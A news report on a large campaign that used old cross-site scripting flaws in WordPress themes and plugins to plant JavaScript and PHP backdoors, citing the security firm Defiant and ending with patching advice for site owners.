More than 900,000 WordPress websites have been attacked by a hacker over the space of about a week, according to a recent report from the cybersecurity company Defiant. The attacks were conducted using around 24,000 different IP addresses, but they are all believed to be the work of a single hacker as they were all attempting to insert the same malicious JavaScript backdoor into the websites.
While the attacks have been ongoing for around a month, the peak occurred on May 3, when around half a million sites were websites were targeted in around 20 million attacks. Multiple flaws have been targeted, most of which are cross-site scripting vulnerabilities in the Newspaper theme and the Easy2Map and Blog Designer plugins. Vulnerabilities in the WP GDPR Compliance and Total Donations WordPress plugins have also been targeted. The vulnerabilities being targeted are old and patches to correct the flaws were released several months ago.
Admins that are not logged in will be directed to a malvertising URL. If an admin is currently logged into the website and the malicious JavaScript is executed, an attempt is made to inject a PHP backdoor into the header of the theme along with different malicious JavaScript code. The JavaScript then attempts to download another payload which is executed by including it in the theme’s header.
“This method would allow the attacker to maintain control of the site, as they could simply change the contents of the file at https://stat[.]trackstatisticsss[.]com/n.txt to code of their choice which could be used to embed a webshell, create a malicious administrator, or even delete the entire contents of the site,” said Defiant.
Defiant warns that the scale of the campaign and variety of the attacks make it possible that all WordPress sites could be exposed to attack, and suggest the hacker will likely use other vulnerabilities in future attacks.
WordPress website owners have been advised to login to their websites and ensure they are running the latest version of WordPress, update all plugins on the site, and to delete all plug-ins that have been removed from the WordPress repository. Website owners should also consider using a web application firewall, which will provide protection against unpatched vulnerabilities.